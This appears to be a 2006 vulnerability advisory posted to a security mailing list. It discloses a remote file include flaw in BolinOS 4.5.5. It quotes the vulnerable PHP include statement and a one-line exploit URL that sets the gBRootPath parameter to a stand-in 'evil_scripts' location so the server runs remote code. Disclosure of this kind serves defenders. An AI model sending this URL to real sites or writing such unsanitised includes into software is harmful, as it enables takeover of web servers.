Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

easypage.org >> v7 sql injection

Limbo - Lite Mambo CMS Multiple Vulnerabilities

Roller Weblogger XSS vulnerability

SolpotCrew Advisory #10 - phpBB XS (phpbb_root_path) Remote File Include

From:	x0r0n_(at)_hotmail.com <x0r0n_(at)_hotmail.com>
Date:	18.09.2006
Subject:	BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Author: xoron (turkish hacker)
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Class : Remote
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Vuln Code: include ($GLOBALS["gBRootPath"].$GLOBALS["gBSysPath"].
"/system/_b/contentFiles/gBLib.php");
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Exploit: http://www.site.com/[script path]/system/_b/contentFiles/gBIndex.php?gBRootPath=evil_scripts?
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+ Thanx : str0ke, Ironfist, Preddy, SHiKaA, mdx, gьltekin, R3D4C!D, DaRK, insomnia, mirim, Dreamlord,
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=

# milw0rm.com [2006-09-15]